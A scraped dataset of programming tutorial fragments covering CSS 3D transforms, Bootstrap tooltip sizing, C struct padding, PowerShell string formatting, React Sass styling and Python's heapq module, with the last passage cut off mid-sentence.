[ { "code": null, "e": 38, "s": 0, "text": "CSS also supports 3D transformations." }, { "code": null, "e": 129, "s": 38, "text": "Mouse over the elements below to see the difference between a 2D \nand a 3D transformation:" }, { "code": null, "e": 194, "s": 129, "text": "In this chapter you will learn about the following CSS property:" }, { "code": null, "e": 204, "s": 194, "text": "transform" }, { "code": null, "e": 297, "s": 204, "text": "The numbers in the table specify the first browser version that fully supports the property." }, { "code": null, "e": 383, "s": 297, "text": "With the CSS transform property you can use \nthe following 3D transformation methods:" }, { "code": null, "e": 393, "s": 383, "text": "rotateX()" }, { "code": null, "e": 403, "s": 393, "text": "rotateY()" }, { "code": null, "e": 413, "s": 403, "text": "rotateZ()" }, { "code": null, "e": 490, "s": 413, "text": "The rotateX() method rotates an element around its X-axis at a given degree:" }, { "code": null, "e": 567, "s": 490, "text": "The rotateY() method rotates an element around its Y-axis at a given degree:" }, { "code": null, "e": 644, "s": 567, "text": "The rotateZ() method rotates an element around its Z-axis at a given degree:" }, { "code": null, "e": 725, "s": 644, "text": "With the transform property, rotate the <div> element 150deg around its X-axis.." }, { "code": null, "e": 891, "s": 725, "text": "<style>\ndiv {\n width: 100px;\n height: 100px;\n background-color: lightblue;\n border: 1px solid black;\n : ;\n}\n</style>\n\n<body>\n <div>This is a div</div>\n</body>\n" }, { "code": null, "e": 910, "s": 891, "text": "Start the Exercise" }, { "code": null, "e": 969, "s": 910, "text": "The following table lists all the 3D transform properties:" }, { "code": null, "e": 1002, "s": 969, "text": "We just launchedW3Schools videos" }, { "code": null, "e": 1044, "s": 1002, "text": "Get certifiedby completinga course today!" }, { "code": null, "e": 1151, "s": 1044, "text": "If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail:" }, { "code": null, "e": 1170, "s": 1151, "text": "[email protected]" } ]
How to change the width and height of Twitter Bootstrap's tooltips? - GeeksforGeeks
31 Jan, 2020 Bootstrap tooltip: A Tooltip is used to provide interactive textual hints to the user about the element when the mouse pointer moves over. Standardized bootstrap element collection like a small pop-up which appears whenever user performs any specific action click, hover(default), and focus on that element. It also supports manual trigger for specific events. In this article, we will design the tooltip first then we will manipulate the height and width of that tooltip.Create tooltip: The data-toggle=”tooltip” attribute is used to create a tooltip. The title attribute is used to specify the text that should be displayed inside the tooltip. Program:<!DOCTYPE html> <html lang="en"> <head> <title>Tooltip</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"> <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script> <script src= "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"> </script> <script src= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"> </script> </head> <body style="text-align:center;"> <div class="container"> <h1 style="color:green;" data-toggle="tooltip" title="Tooltip"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle="tooltip"]').tooltip(); }); </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <title>Tooltip</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"> <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script> <script src= "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"> </script> <script src= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"> </script> </head> <body style="text-align:center;"> <div class="container"> <h1 style="color:green;" data-toggle="tooltip" title="Tooltip"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle="tooltip"]').tooltip(); }); </script> </body> </html> Output: Changing width/height of tooltip: Here, we will modify the .tooltip-inner class for satisfying that demand by over-riding the some of the default CSS properties. Below is the implementation for the same. Program:<!DOCTYPE html> <html lang="en"> <head> <title>Tooltip</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"> <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script> <script src= "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"> </script> <script src= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class="container"> <h1 data-toggle="tooltip" title="A Computer Science Portal for Geeks"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle="tooltip"]').tooltip(); }); </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <title>Tooltip</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"> <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script> <script src= "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"> </script> <script src= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class="container"> <h1 data-toggle="tooltip" title="A Computer Science Portal for Geeks"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle="tooltip"]').tooltip(); }); </script> </body> </html> Output: Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course. Bootstrap-Misc CSS-Misc HTML-Misc Picked Technical Scripter 2019 Bootstrap HTML Technical Scripter Web Technologies Web technologies Questions HTML Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. How to Show Images on Click using HTML ? How to set Bootstrap Timepicker using datetimepicker library ? How to change the background color of the active nav-item? How to Use Bootstrap with React? Difference between Bootstrap 4 and Bootstrap 5 How to insert spaces/tabs in text using HTML/CSS? Top 10 Projects For Beginners To Practice HTML and CSS Skills How to update Node.js and NPM to next version ? How to set input type date in dd-mm-yyyy format using HTML ? Hide or show elements in HTML using display property
[ { "code": null, "e": 25104, "s": 25076, "text": "\n31 Jan, 2020" }, { "code": null, "e": 25465, "s": 25104, "text": "Bootstrap tooltip: A Tooltip is used to provide interactive textual hints to the user about the element when the mouse pointer moves over. Standardized bootstrap element collection like a small pop-up which appears whenever user performs any specific action click, hover(default), and focus on that element. It also supports manual trigger for specific events." }, { "code": null, "e": 25750, "s": 25465, "text": "In this article, we will design the tooltip first then we will manipulate the height and width of that tooltip.Create tooltip: The data-toggle=”tooltip” attribute is used to create a tooltip. The title attribute is used to specify the text that should be displayed inside the tooltip." }, { "code": null, "e": 26752, "s": 25750, "text": "Program:<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> </head> <body style=\"text-align:center;\"> <div class=\"container\"> <h1 style=\"color:green;\" data-toggle=\"tooltip\" title=\"Tooltip\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> " }, { "code": "<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> </head> <body style=\"text-align:center;\"> <div class=\"container\"> <h1 style=\"color:green;\" data-toggle=\"tooltip\" title=\"Tooltip\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> ", "e": 27746, "s": 26752, "text": null }, { "code": null, "e": 27754, "s": 27746, "text": "Output:" }, { "code": null, "e": 27958, "s": 27754, "text": "Changing width/height of tooltip: Here, we will modify the .tooltip-inner class for satisfying that demand by over-riding the some of the default CSS properties. Below is the implementation for the same." }, { "code": null, "e": 29261, "s": 27958, "text": "Program:<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class=\"container\"> <h1 data-toggle=\"tooltip\" title=\"A Computer Science Portal for Geeks\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> " }, { "code": "<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class=\"container\"> <h1 data-toggle=\"tooltip\" title=\"A Computer Science Portal for Geeks\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> ", "e": 30556, "s": 29261, "text": null }, { "code": null, "e": 30564, "s": 30556, "text": "Output:" }, { "code": null, "e": 30701, "s": 30564, "text": "Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course." }, { "code": null, "e": 30716, "s": 30701, "text": "Bootstrap-Misc" }, { "code": null, "e": 30725, "s": 30716, "text": "CSS-Misc" }, { "code": null, "e": 30735, "s": 30725, "text": "HTML-Misc" }, { "code": null, "e": 30742, "s": 30735, "text": "Picked" }, { "code": null, "e": 30766, "s": 30742, "text": "Technical Scripter 2019" }, { "code": null, "e": 30776, "s": 30766, "text": "Bootstrap" }, { "code": null, "e": 30781, "s": 30776, "text": "HTML" }, { "code": null, "e": 30800, "s": 30781, "text": "Technical Scripter" }, { "code": null, "e": 30817, "s": 30800, "text": "Web Technologies" }, { "code": null, "e": 30844, "s": 30817, "text": "Web technologies Questions" }, { "code": null, "e": 30849, "s": 30844, "text": "HTML" }, { "code": null, "e": 30947, "s": 30849, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30988, "s": 30947, "text": "How to Show Images on Click using HTML ?" }, { "code": null, "e": 31051, "s": 30988, "text": "How to set Bootstrap Timepicker using datetimepicker library ?" }, { "code": null, "e": 31110, "s": 31051, "text": "How to change the background color of the active nav-item?" }, { "code": null, "e": 31143, "s": 31110, "text": "How to Use Bootstrap with React?" }, { "code": null, "e": 31190, "s": 31143, "text": "Difference between Bootstrap 4 and Bootstrap 5" }, { "code": null, "e": 31240, "s": 31190, "text": "How to insert spaces/tabs in text using HTML/CSS?" }, { "code": null, "e": 31302, "s": 31240, "text": "Top 10 Projects For Beginners To Practice HTML and CSS Skills" }, { "code": null, "e": 31350, "s": 31302, "text": "How to update Node.js and NPM to next version ?" }, { "code": null, "e": 31411, "s": 31350, "text": "How to set input type date in dd-mm-yyyy format using HTML ?" } ]
Why isn't sizeof for a struct equal to the sum of sizeof of each member in C/C++?
The size of a struct type element taken by sizeof() is not always equal to the size of each individual member. Sometimes the compilers add some padding to avoid alignment issues. So the size may change. The padding is added when a structure member is followed by a member with a larger size or at the end of the structure. Different compiler has different types of alignment constraints. In C standard, the total alignment structure depends on the implementation. In this case the double z is 8-byte long, which is larger than x (4-byte). So another 4-byte padding is added. Also short type data y has 2-byte space in memory so extra 6-bytes are added as padding. #include <stdio.h> struct myStruct { int x; //Integer takes 4 bytes, and padding 4 bytes double z; //Size of double is 8-byte, no padding short int y; //Size of short is 2-byte, padding 6-bytes }; main() { printf("Size of struct: %d", sizeof(struct myStruct)); } Size of struct: 24 In this case the double is inserted at first, and it takes 8-bytes of space. Now the integer x (4-byte) is added. So there is another 4-byte space. When the short y is added, it can be placed into that extra 4-byte space and occupies total 16-bytes of space. #include <stdio.h> struct myStruct { double z; //Size of double is 8-byte, no padding int x; //Integer takes 4 bytes, and padding 4 bytes short int y; //Size of short is 2-byte, padding 6-bytes }; main() { printf("Size of struct: %d", sizeof(struct myStruct)); } Size of struct: 16 In the third case it also takes 16-byte of memory space, but the arrangements are different. As the first member is double then it is placed at first, then the short type data is added. Now when the integer is trying to insert, it can be placed into the remaining 6-byte area. So one padding is present after short but no padding is required after the integer data. #include <stdio.h> struct myStruct { double z; //Size of double is 8-byte, no padding short int y; //Size of short is 2-byte, padding 6-bytes int x; //Integer takes 4 bytes, and padding 4 bytes }; main() { printf("Size of struct: %d", sizeof(struct myStruct)); } Size of struct: 16
[ { "code": null, "e": 1526, "s": 1062, "text": "The size of a struct type element taken by sizeof() is not always equal to the size of each individual member. Sometimes the compilers add some padding to avoid alignment issues. So the size may change. The padding is added when a structure member is followed by a member with a larger size or at the end of the structure. Different compiler has different types of alignment constraints. In C standard, the total alignment structure depends on the implementation." }, { "code": null, "e": 1726, "s": 1526, "text": "In this case the double z is 8-byte long, which is larger than x (4-byte). So another 4-byte padding is added. Also short type data y has 2-byte space in memory so extra 6-bytes are added as padding." }, { "code": null, "e": 2001, "s": 1726, "text": "#include <stdio.h>\nstruct myStruct {\n int x; //Integer takes 4 bytes, and padding 4 bytes\n double z; //Size of double is 8-byte, no padding\n short int y; //Size of short is 2-byte, padding 6-bytes\n};\nmain() {\n printf(\"Size of struct: %d\", sizeof(struct myStruct));\n}" }, { "code": null, "e": 2020, "s": 2001, "text": "Size of struct: 24" }, { "code": null, "e": 2279, "s": 2020, "text": "In this case the double is inserted at first, and it takes 8-bytes of space. Now the integer x (4-byte) is added. So there is another 4-byte space. When the short y is added, it can be placed into that extra 4-byte space and occupies total 16-bytes of space." }, { "code": null, "e": 2554, "s": 2279, "text": "#include <stdio.h>\nstruct myStruct {\n double z; //Size of double is 8-byte, no padding\n int x; //Integer takes 4 bytes, and padding 4 bytes\n short int y; //Size of short is 2-byte, padding 6-bytes\n};\nmain() {\n printf(\"Size of struct: %d\", sizeof(struct myStruct));\n}" }, { "code": null, "e": 2573, "s": 2554, "text": "Size of struct: 16" }, { "code": null, "e": 2939, "s": 2573, "text": "In the third case it also takes 16-byte of memory space, but the arrangements are different. As the first member is double then it is placed at first, then the short type data is added. Now when the integer is trying to insert, it can be placed into the remaining 6-byte area. So one padding is present after short but no padding is required after the integer data." }, { "code": null, "e": 3214, "s": 2939, "text": "#include <stdio.h>\nstruct myStruct {\n double z; //Size of double is 8-byte, no padding\n short int y; //Size of short is 2-byte, padding 6-bytes\n int x; //Integer takes 4 bytes, and padding 4 bytes\n};\nmain() {\n printf(\"Size of struct: %d\", sizeof(struct myStruct));\n}" }, { "code": null, "e": 3233, "s": 3214, "text": "Size of struct: 16" } ]
How to format string using PowerShell?
To format a string in a PowerShell we can use various methods. First using the simple expanding string method. PS C:\> $str = 'PowerShell' PS C:\> Write-Output "Hello $str !!!!" Hello PowerShell !!!! Second, using the format method. In this method, we will use the Format function of the String .NET class. PS C:\> $str = "PowerShell" PS C:\> [String]::Format("Hello $str...!!!") Hello PowerShell...!!! The third method using the Format operator. We can use the number format here as shown below. PS C:\> $str = 'PowerShell' PS C:\> "Hello {0}" -f $str Hello PowerShell If we have multiple variables then we need to increase the numbers inside the curly brackets. For example, PS C:\> $str = "PowerShell" PS C:\> $str1 = "Azure" PS C:\> "Hello {0} and {1}" -f $str,$str1 Hello PowerShell and Azure You can also use the same format operator inside the format method. PS C:\> [String]::Format("Hello {0} and {1}", $str,$str1) Hello PowerShell and Azure
[ { "code": null, "e": 1173, "s": 1062, "text": "To format a string in a PowerShell we can use various methods. First using the simple expanding string method." }, { "code": null, "e": 1262, "s": 1173, "text": "PS C:\\> $str = 'PowerShell'\nPS C:\\> Write-Output \"Hello $str !!!!\"\nHello PowerShell !!!!" }, { "code": null, "e": 1369, "s": 1262, "text": "Second, using the format method. In this method, we will use the Format function of the String .NET class." }, { "code": null, "e": 1465, "s": 1369, "text": "PS C:\\> $str = \"PowerShell\"\nPS C:\\> [String]::Format(\"Hello $str...!!!\")\nHello PowerShell...!!!" }, { "code": null, "e": 1559, "s": 1465, "text": "The third method using the Format operator. We can use the number format here as shown below." }, { "code": null, "e": 1632, "s": 1559, "text": "PS C:\\> $str = 'PowerShell'\nPS C:\\> \"Hello {0}\" -f $str\nHello PowerShell" }, { "code": null, "e": 1739, "s": 1632, "text": "If we have multiple variables then we need to increase the numbers inside the curly brackets. For example," }, { "code": null, "e": 1860, "s": 1739, "text": "PS C:\\> $str = \"PowerShell\"\nPS C:\\> $str1 = \"Azure\"\nPS C:\\> \"Hello {0} and {1}\" -f $str,$str1\nHello PowerShell and Azure" }, { "code": null, "e": 1928, "s": 1860, "text": "You can also use the same format operator inside the format method." }, { "code": null, "e": 2013, "s": 1928, "text": "PS C:\\> [String]::Format(\"Hello {0} and {1}\", $str,$str1)\nHello PowerShell and Azure" } ]
React Sass Styling
Sass is a CSS pre-processor. Sass files are executed on the server and sends CSS to the browser. You can learn more about Sass in our Sass Tutorial. If you use the create-react-app in your project, you can easily install and use Sass in your React projects. Install Sass by running this command in your terminal: Now you are ready to include Sass files in your project! Create a Sass file the same way as you create CSS files, but Sass files have the file extension .scss In Sass files you can use variables and other Sass functions: Create a variable to define the color of the text: $myColor: red; h1 { color: $myColor; } Import the Sass file the same way as you imported a CSS file: import React from 'react'; import ReactDOM from 'react-dom/client'; import './my-sass.scss'; const Header = () => { return ( <> <h1>Hello Style!</h1> <p>Add a little style!.</p> </> ); } const root = ReactDOM.createRoot(document.getElementById('root')); root.render(<Header />); Run Example » We just launchedW3Schools videos Get certifiedby completinga course today! If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail: [email protected] Your message has been sent to W3Schools.
[ { "code": null, "e": 29, "s": 0, "text": "Sass is a CSS pre-processor." }, { "code": null, "e": 98, "s": 29, "text": "Sass files are executed on the server and sends CSS to the \nbrowser." }, { "code": null, "e": 150, "s": 98, "text": "You can learn more about Sass in our\nSass Tutorial." }, { "code": null, "e": 260, "s": 150, "text": "If you use the create-react-app in your project, you can easily \ninstall and use Sass in your React projects." }, { "code": null, "e": 315, "s": 260, "text": "Install Sass by running this command in your terminal:" }, { "code": null, "e": 372, "s": 315, "text": "Now you are ready to include Sass files in your project!" }, { "code": null, "e": 475, "s": 372, "text": "Create a Sass file the same way as you create CSS files, but Sass files have the \nfile extension .scss" }, { "code": null, "e": 537, "s": 475, "text": "In Sass files you can use variables and other Sass functions:" }, { "code": null, "e": 588, "s": 537, "text": "Create a variable to define the color of the text:" }, { "code": null, "e": 630, "s": 588, "text": "$myColor: red;\n\nh1 {\n color: $myColor;\n}" }, { "code": null, "e": 692, "s": 630, "text": "Import the Sass file the same way as you imported a CSS file:" }, { "code": null, "e": 1000, "s": 692, "text": "import React from 'react';\nimport ReactDOM from 'react-dom/client';\nimport './my-sass.scss';\n\nconst Header = () => {\n return (\n <>\n <h1>Hello Style!</h1>\n <p>Add a little style!.</p>\n </>\n );\n}\n\nconst root = ReactDOM.createRoot(document.getElementById('root'));\nroot.render(<Header />);\n \n" }, { "code": null, "e": 1017, "s": 1000, "text": "\nRun \nExample »\n" }, { "code": null, "e": 1050, "s": 1017, "text": "We just launchedW3Schools videos" }, { "code": null, "e": 1092, "s": 1050, "text": "Get certifiedby completinga course today!" }, { "code": null, "e": 1199, "s": 1092, "text": "If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail:" }, { "code": null, "e": 1218, "s": 1199, "text": "[email protected]" } ]
Introduction to Python Heapq Module | by Vijini Mallawaarachchi | Towards Data Science
A Heap is a special case of a binary tree where the parent nodes are compared to their children with their values and are arranged accordingly. If you have come across my previous article titled 8 Common Data Structures every Programmer must know that there are two types of heaps; min heap and max heap. towardsdatascience.com The heapq module of python implements the heap queue algorithm. It uses the min heap where the key of the parent is less than or equal to those of its children. In this article, I will introduce the python heapq module and walk you through some examples of how to use heapq with primitive data types and objects with complex data. Assuming that you know how the heap data structure works, let’s see what functions are provided by Python’s heapq model. heappush(heap, item) — Push the value item into the heap heappop(heap) — Pop and return the smallest value from the heap heappushpop(heap, item) — Push the value item into the heap and return the smallest value from the heap heapify(x) — Convert the list x into a heap heapreplace(heap, item) — Pop and return the smallest value from the heap then push the value item into the heap Let’s see some examples where we use different heapq functions. First of all, you have to import the heapq module. import heapq Consider the example list a as given below. >>> a = [52, 94, 13, 77, 41] If we heapify this list, the result will be as follows. Note that heapifying is done in-place. >>> heapq.heapify(a)>>> print(a)[13, 41, 52, 77, 94] Note that the 0th index contains the smallest value out of all the values, which is 13. Let’s push the value 10 to our heap. >>> heapq.heappush(a,10)>>> print(a)[10, 41, 13, 77, 94, 52] Note that 10 is added and since 10 is the smallest value out of the available values, it is in the 0th index. Now let’s pop from our heap. >>> print(heapq.heappop(a))10>>> print(a)[13, 41, 52, 77, 94] When we pop from our heap, it will remove the smallest value from the heap and return it. Now the value 10 is no longer in our heap. Let’s see how the heappushpop() functions works. Let’s heappushpop the value 28. >>> print(heapq.heappushpop(a,28))13>>> print(a)[28, 41, 52, 77, 94] You can see that 28 is pushed to the heap and the smallest value 13 is popped from the heap. Now let’s try the heapreplace() function. Let’s heapreplace the value 3 in to the heap. >>> print(heapq.heapreplace(a,3))28>>> print(a)[3, 41, 52, 77, 94] You can see that the initially smallest value 28 is popped and then our new value 3 is pushed. The 0th index in the new heap value 3. Note the difference in the order of push and pop actions in heappushpop() and heapreplace() functions. In the previous example, I have explained how to use heapq functions with primitive data types such as integers. Similarly, we can use objects with heapq functions to order complex data such as tuples or even strings. For this, we need to have a wrapper class according to our scenario. Consider a case where you want to store strings and order them by the length of the strings, shortest to longest. Our wrapper class will look as follows. class DataWrap: def __init__(self, data): self.data = data def __lt__(self, other): return len(self.data) < len(other.data) The __lt__ function (it is the operator overloading function for comparison operators; >, ≥, ==, < and ≤) will contain the logic to compare the lengths of strings. Now let’s try to make a heap with some strings. # Create list of stringsmy_strings = ["write", "go", "run", "come"]# Initialisingsorted_strings = []# Wrap strings and push to heapfor s in my_strings: heapObj = DataWrap(s) heapq.heappush(sorted_strings, heapObj)# Print the heapfor myObj in sorted_strings: print(myObj.data, end="\t") The output from printing items from the heap will be as follows. go come run write Note that the shortest word go is in the front of the heap. Now you can try out other heapq functions by wrapping strings. We can easily implement a max heap using heapq. All you have to do it change the comparison operator in the __lt__ function to order the largest value to the front. Let’s try the previous example with strings and their lengths. class DataWrap: def __init__(self, data): self.data = data def __lt__(self, other): return len(self.data) > len(other.data)# Create list of stringsmy_strings = ["write", "go", "run", "come"]# Initialisingsorted_strings = []# Wrap strings and push to heapfor s in my_strings: heapObj = DataWrap(s) heapq.heappush(sorted_strings, heapObj)# Print the heapfor myObj in sorted_strings: print(myObj.data, end="\t") Note how the length comparison has changed in the __lt__ function of the DataWrap class. The output from printing items from this heap will be as follows. write come run go Note that now the longest word write is in the front of the heap. I hope you found this article informative and useful during implementations with the heapq module. Please feel free to play around with the code provided. Thank you for reading! Cheers! [1] heapq — Heap queue algorithm — Python 3.8.3rc1 documentation (https://docs.python.org/3/library/heapq.html)
[ { "code": null, "e": 476, "s": 171, "text": "A Heap is a special case of a binary tree where the parent nodes are compared to their children with their values and are arranged accordingly. If you have come across my previous article titled 8 Common Data Structures every Programmer must know that there are two types of heaps; min heap and max heap." }, { "code": null, "e": 499, "s": 476, "text": "towardsdatascience.com" }, { "code": null, "e": 830, "s": 499, "text": "The heapq module of python implements the heap queue algorithm. It uses the min heap where the key of the parent is less than or equal to those of its children. In this article, I will introduce the python heapq module and walk you through some examples of how to use heapq with primitive data types and objects with complex data." }, { "code": null, "e": 951, "s": 830, "text": "Assuming that you know how the heap data structure works, let’s see what functions are provided by Python’s heapq model." }, { "code": null, "e": 1008, "s": 951, "text": "heappush(heap, item) — Push the value item into the heap" }, { "code": null, "e": 1072, "s": 1008, "text": "heappop(heap) — Pop and return the smallest value from the heap" }, { "code": null, "e": 1176, "s": 1072, "text": "heappushpop(heap, item) — Push the value item into the heap and return the smallest value from the heap" }, { "code": null, "e": 1220, "s": 1176, "text": "heapify(x) — Convert the list x into a heap" }, { "code": null, "e": 1333, "s": 1220, "text": "heapreplace(heap, item) — Pop and return the smallest value from the heap then push the value item into the heap" }, { "code": null, "e": 1448, "s": 1333, "text": "Let’s see some examples where we use different heapq functions. First of all, you have to import the heapq module." }, { "code": null, "e": 1461, "s": 1448, "text": "import heapq" }, { "code": null, "e": 1505, "s": 1461, "text": "Consider the example list a as given below." }, { "code": null, "e": 1534, "s": 1505, "text": ">>> a = [52, 94, 13, 77, 41]" }, { "code": null, "e": 1629, "s": 1534, "text": "If we heapify this list, the result will be as follows. Note that heapifying is done in-place." }, { "code": null, "e": 1682, "s": 1629, "text": ">>> heapq.heapify(a)>>> print(a)[13, 41, 52, 77, 94]" }, { "code": null, "e": 1770, "s": 1682, "text": "Note that the 0th index contains the smallest value out of all the values, which is 13." }, { "code": null, "e": 1807, "s": 1770, "text": "Let’s push the value 10 to our heap." }, { "code": null, "e": 1868, "s": 1807, "text": ">>> heapq.heappush(a,10)>>> print(a)[10, 41, 13, 77, 94, 52]" }, { "code": null, "e": 1978, "s": 1868, "text": "Note that 10 is added and since 10 is the smallest value out of the available values, it is in the 0th index." }, { "code": null, "e": 2007, "s": 1978, "text": "Now let’s pop from our heap." }, { "code": null, "e": 2069, "s": 2007, "text": ">>> print(heapq.heappop(a))10>>> print(a)[13, 41, 52, 77, 94]" }, { "code": null, "e": 2202, "s": 2069, "text": "When we pop from our heap, it will remove the smallest value from the heap and return it. Now the value 10 is no longer in our heap." }, { "code": null, "e": 2283, "s": 2202, "text": "Let’s see how the heappushpop() functions works. Let’s heappushpop the value 28." }, { "code": null, "e": 2352, "s": 2283, "text": ">>> print(heapq.heappushpop(a,28))13>>> print(a)[28, 41, 52, 77, 94]" }, { "code": null, "e": 2445, "s": 2352, "text": "You can see that 28 is pushed to the heap and the smallest value 13 is popped from the heap." }, { "code": null, "e": 2533, "s": 2445, "text": "Now let’s try the heapreplace() function. Let’s heapreplace the value 3 in to the heap." }, { "code": null, "e": 2600, "s": 2533, "text": ">>> print(heapq.heapreplace(a,3))28>>> print(a)[3, 41, 52, 77, 94]" }, { "code": null, "e": 2837, "s": 2600, "text": "You can see that the initially smallest value 28 is popped and then our new value 3 is pushed. The 0th index in the new heap value 3. Note the difference in the order of push and pop actions in heappushpop() and heapreplace() functions." }, { "code": null, "e": 3278, "s": 2837, "text": "In the previous example, I have explained how to use heapq functions with primitive data types such as integers. Similarly, we can use objects with heapq functions to order complex data such as tuples or even strings. For this, we need to have a wrapper class according to our scenario. Consider a case where you want to store strings and order them by the length of the strings, shortest to longest. Our wrapper class will look as follows." }, { "code": null, "e": 3432, "s": 3278, "text": "class DataWrap: def __init__(self, data): self.data = data def __lt__(self, other): return len(self.data) < len(other.data)" }, { "code": null, "e": 3644, "s": 3432, "text": "The __lt__ function (it is the operator overloading function for comparison operators; >, ≥, ==, < and ≤) will contain the logic to compare the lengths of strings. Now let’s try to make a heap with some strings." }, { "code": null, "e": 3939, "s": 3644, "text": "# Create list of stringsmy_strings = [\"write\", \"go\", \"run\", \"come\"]# Initialisingsorted_strings = []# Wrap strings and push to heapfor s in my_strings: heapObj = DataWrap(s) heapq.heappush(sorted_strings, heapObj)# Print the heapfor myObj in sorted_strings: print(myObj.data, end=\"\\t\")" }, { "code": null, "e": 4004, "s": 3939, "text": "The output from printing items from the heap will be as follows." }, { "code": null, "e": 4022, "s": 4004, "text": "go\tcome\trun\twrite" }, { "code": null, "e": 4145, "s": 4022, "text": "Note that the shortest word go is in the front of the heap. Now you can try out other heapq functions by wrapping strings." }, { "code": null, "e": 4373, "s": 4145, "text": "We can easily implement a max heap using heapq. All you have to do it change the comparison operator in the __lt__ function to order the largest value to the front. Let’s try the previous example with 